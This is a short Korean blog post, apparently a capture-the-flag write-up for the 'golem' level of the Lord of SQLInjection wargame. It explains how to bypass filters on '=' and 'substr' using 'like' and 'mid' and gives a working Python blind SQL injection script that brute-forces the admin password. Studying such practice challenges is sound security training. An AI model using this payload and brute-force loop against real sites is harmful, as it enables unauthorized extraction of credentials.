블라인드 sql을 해야 하는데 or과 and는 ||와 &&를 쓰면 되고, =와 substr이 막혀있다.
=는 like를 대신 쓰면 되고, substr은 mid를 대신 쓰면 된다.
"?pw='||id like 'admin' %26%26 ascii(mid(pw,"+str(i)+",1)) like "+str(j)+"-- -"
import requests
pw = ""
cookie = {"PHPSESSID": "49jle25ne50oqi47t3s3klmn0e"}
page = "golem_4b5202cfedd8160e73124b5234235ef5"
for i in range(1, 9):
for j in range(32, 128):
url = "https://los.rubiya.kr/chall/"+page+".php?pw=' || id like 'admin' %26%26 ascii(mid(pw,"+str(i)+",1)) like "+str(j)+"-- -"
res = requests.get(url, cookies=cookie)
if "Hello admin" in res.text:
pw += chr(j)
print(pw)
break;77d6290b 인걸 알 수 있다.
728x90
'해킹 > writeup' 카테고리의 다른 글
| webhacking.kr - 52 (0) | 2021.08.25 |
|---|---|
| dreamhack.io - web-ssrf (0) | 2021.08.25 |
| rubiya - skeleton (0) | 2021.08.18 |
| rubiya - vampire (0) | 2021.08.18 |
| dreamhack.io - simple_sqli (0) | 2021.08.18 |